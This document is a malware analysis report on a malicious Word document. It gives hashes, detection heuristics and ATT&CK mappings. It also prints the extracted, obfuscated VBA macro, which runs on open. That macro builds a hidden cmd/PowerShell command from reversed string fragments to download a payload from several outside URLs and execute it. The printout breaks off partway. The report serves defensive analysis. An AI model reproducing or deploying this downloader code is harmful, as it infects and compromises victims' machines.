Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 92a725692661c208…

MALICIOUS

Office (OLE)

Size: 72.6 KB · Created: 2018-09-12 16:55:00 · Authoring application: Microsoft Office Word · First seen: 2019-02-10
MD5: f60ec66986d82287e4bcc62a36d9461d SHA-1: 090518247e520cc35e7bfe5e173ac678d2321b88 SHA-256: 92a725692661c20840f83f3a200d0ffb4707bb3ad9a41c83ef2e8fd912b163ae
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell() function. The Shell() call launches a command-line utility, likely to download and execute a second-stage payload. The ClamAV heuristic also flags the file as a downloader.

Heuristics 6

  • ClamAV: Doc.Downloader.Nastjencro-6682581-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Nastjencro-6682581-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this is the heuristic's generic description: for this sample a VBA project was in fact recovered (see OLE_VBA_MACROS and the extracted macros.bas below), so the legacy marker is corroborating rather than sole evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5008 bytes
SHA-256: d8f556930e6c793036d26fb49c90f3387fff19b3b3c3042e8014e2d3f6d7ebab
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FqbciqGtwBwuc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' NOTE(review): auto-executing entry point (OLE_VBA_AUTOOPEN). Word runs this
' Sub when the document is opened; no user action beyond opening is needed.
Sub AutoOpen()
' `On Error Resume Next`, split over four lines with `_` continuations. While it
' is active every runtime error below is silently skipped, so the assignments
' to undefined names that follow never abort the macro.
On _
Error _
Resume _
Next
   ' None of the names on either side of these `Set` lines is defined anywhere
   ' in the visible extracted source; they appear to be padding/obfuscation that
   ' is a no-op under Resume Next — TODO confirm against the full macros.bas.
   Set utbfpj = djuwo
   Set nWNOpc = wczszW
   Set iMqKWn = JBXdd
   Set OiELWi = Oowmv
   Set msNHrL = MHWzM
   Set tkhNw = zXjnTE
' The Shell() call flagged by OLE_VBA_SHELL. The command line is the
' concatenation of four string-returning functions: VzqHBzaQj and vXzqHfWOzF
' are in this preview, BJuTjjKtKmH and vjaBJVlraMN are not. Format(0) yields
' "0", i.e. window style vbHide, so the spawned process window is not shown.
Shell VzqHBzaQj + vXzqHfWOzF + BJuTjjKtKmH + vjaBJVlraMN, Format(0)
   Set cwCUjB = RXvwD
   Set BbhNJI = jnorb
End Sub



Attribute VB_Name = "nbwhzlh"
' Builds the first segment of the command line that AutoOpen() passes to
' Shell(). The text is assembled from short literals plus Chr() calls whose
' arguments are written as sums, and cmd.exe caret (^) escapes are sprinkled
' through it; both are obfuscation, not functionality.
'   Chr(12 + 7 + 7 + 18 + 55) = Chr(99) = "c"
'   Chr(8 + 4 + 4 + 12 + 39)  = Chr(67) = "C"
'   Chr(3 + 2 + 2 + 5 + 22)   = Chr(34) = " (double quote)
' Returns: the concatenated fragment (assigned to VzqHBzaQj near the end).
' Takes no parameters.
Function VzqHBzaQj()

' Same four-line `On Error Resume Next` as in AutoOpen. The `Set` lines
' interleaved between the string fragments reference names that are not
' defined in the visible source and appear to be no-op padding.
On _
Error _
Resume _
Next
Set csHou = wtOsjC
   Set bnObDw = owpWF
   Set OnWZVr = jUXtD
   Set HZBYT = oAsczk
' With the Chr() values substituted and carets removed this reads
' `cmd /V:/C"set wuj2= ...`: /V turns on delayed environment-variable
' expansion in cmd.exe and the rest of the payload text is stored in the
' wuj2 variable.
jwJqCmH = Format(Chr(12 + 7 + 7 + 18 + 55)) + "md " + "/V:/" + Format(Chr(8 + 4 + 4 + 12 + 39)) + Format(Chr(3 + 2 + 2 + 5 + 22)) + "s^e^" + "t " + "w^uj^2=" + " ^ " + " ^ ^ "
Set RSoJOf = VHjCIr
   Set hzKzjX = wmhvNu
   Set lLinDF = uXtjD
   Set QjwjBu = ZjIZcT
' From here on the fragments read as reversed text once carets are dropped,
' e.g. `^ka^er^` + `b;` -> `;break`, `m^e^tI-^e^k^ovn^I` -> `Invoke-Item`,
' `Fd^a^oln^w^o^D.` -> `.DownloadF`, `n//^` + `:ptt` + `^h@` -> `@http://n`.
' That is a reversed PowerShell download-and-run stanza, presumably put back
' in order at runtime by a delayed-expansion substring trick that is outside
' this preview. The `@http://` separators mark where the URL list sits; the
' hostnames are recoverable by reversing the adjacent fragments. This is the
' evidence behind the downloader verdict in Malware Insights.
qKmrSiwEG = "^" + "  ^ " + "^ " + "   ^  ^" + "  ^ }^" + "}" + "{h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^t^"
Set Rjbfv = ZEQlcF
   Set zTuHV = wjtzd
ijpsLadNiz = "a" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^}^" + ";" + "^ka^er^" + "b;" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "Qn^$" + " m^e^" + "tI-" + "^e^k^" + "ovn^I" + ";)" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "Qn$ " + ",^j^Sa" + "$(^el" + "^i^"
Set OalDS = bAcOw
   Set sQPRs = aIFiMf
   Set lmbCi = zqqAZ
   Set iwrfKv = GQihlZ
okwNakOZ = "Fd^a^" + "oln^" + "w" + "o^D." + "r" + "^" + "ij${" + "yrt{"
Set rZXrj = NAMNPG
PGHmkbHEXpN = ")wN^s" + "$ ni jS" + "^" + "a^$(h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + "a" + "^er" + "of;" + "'e^x^"
Set sFCvJ = CBkjO
   Set tRJFi = waBvAo
   Set TwfoEq = pfWJH
   Set XnKUVF = uEKXU
bjqivt = "e" + ".'^+^w^" + "w^" + "H$+^'\" + "^'+" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "i^l" + "^b" + "u" + "p^:vn^" + "e^$^="
Set JCHYWj = FrJdt
itzqfNc = Format(Chr(12 + 7 + 7 + 18 + 55)) + "^Q" + "n$^;^'9" + "^81^' ^" + "= w^w^H" + "^$^;" + ")'@^'" + "(t" + "il^p^" + "S^" + ".^'" + "^" + "8"
Set wamKDN = fSfjYs
   Set kPazV = BjYFS
   Set KrLDI = NzhQl
   Set WotnK = kaZNS
sdFSrdHqO = "X^D^" + "JJ^E^" + "U" + "^Y^x/^" + "m^o" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^.^" + "h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "et^-s" + "ni" + "^m//^:p"
Set urNEk = SUaTjP
   Set UCzpT = wNqlvG
   Set ldswsA = FUMAw
KvEzDXrW = "t^t^h@O" + "^EMu^" + "e" + "7^p" + "^" + "Tr" + "/^kd^"
Set ZGulc = XOdnS
   Set BcJiha = zakXap
pdskkb = ".^8^" + "1^0^2g" + "^o^f" + "n//^" + ":ptt" + "^h@"
' The function's return value: all fragments joined in declaration order.
VzqHBzaQj = jwJqCmH + qKmrSiwEG + ijpsLadNiz + okwNakOZ + PGHmkbHEXpN + bjqivt + itzqfNc + sdFSrdHqO + KvEzDXrW + pdskkb
   Set TFMiiR = dJitZ
   Set pVrwzQ = AUVlOP
   Set ZjlEr = VQfSQ
   Set XLnso = oRbXik
   Set KLpVi = bztEJ
End Function
Function vXzqHfWOzF()

On _
Error _
Resume _
Next
Set wJCUuu = Eqwin
   Set RjiwrU = OtzSo
   Set cwwuk = wkBpwp
iDjDmfJFat = "n^y5Rz" + "^d^w/" + "^" + "m^o" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + ".d^er"
Set hziND = zKbvGf
   Set DBFPK = tAnDLb
   Set tBCMMs = zobbJ
   Set VzdEOU = orawYc
PpwsXOW = "a^" + "uqs" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "n//:p^" + "tth" + "@^INv^" + "9" + "nb" + "ggZ^H" + "/^m^" + "o" + Format(Chr(12 + 7 + 7 + 18 + 55))
Set CbKRRZ = tTrEDN
   Set AwIfoZ = MMkEJ
   Set nQinN = zzLUv
TnYcpYli = "." + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + "u^hphna" + "^h" + "rm//^:" + "^p^tth^" + "@^l^Wa" + "3" + Format(Chr(8 + 4 + 4 + 12 + 39)) + "RJK/"
Set bIwzmj = pMZZB
   Set XQtbNm = ZUCXBv
   Set hMPRff = aQzEnA
   Set TcORfz = naCwJ
   Set khpVpw = dwpQNv
   Set MikCd = fpFFw
KaIjzvip = "^t^en.n" + "e^wi^" + "l^yrra" + "h//" + "^"
Set jPtGMC = qTaPKZ
UQGYAM = ":^p^t" + "t^h'=wN" + "^s^$;t" + "nei^l" + Format(Chr(8 + 4 + 4 + 12 + 39)) + "^" + "b^e^" + "W^.te" + "N^ t" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "e" + "j^b^o-^" + "w^en=r^" + "ij" + "^$" + " l^leh" + "sr^ew^o"
Set AmZLM = oQrcoh
   Set dAMzcJ = uijilu
   Set nbnWr = XG
... (truncated)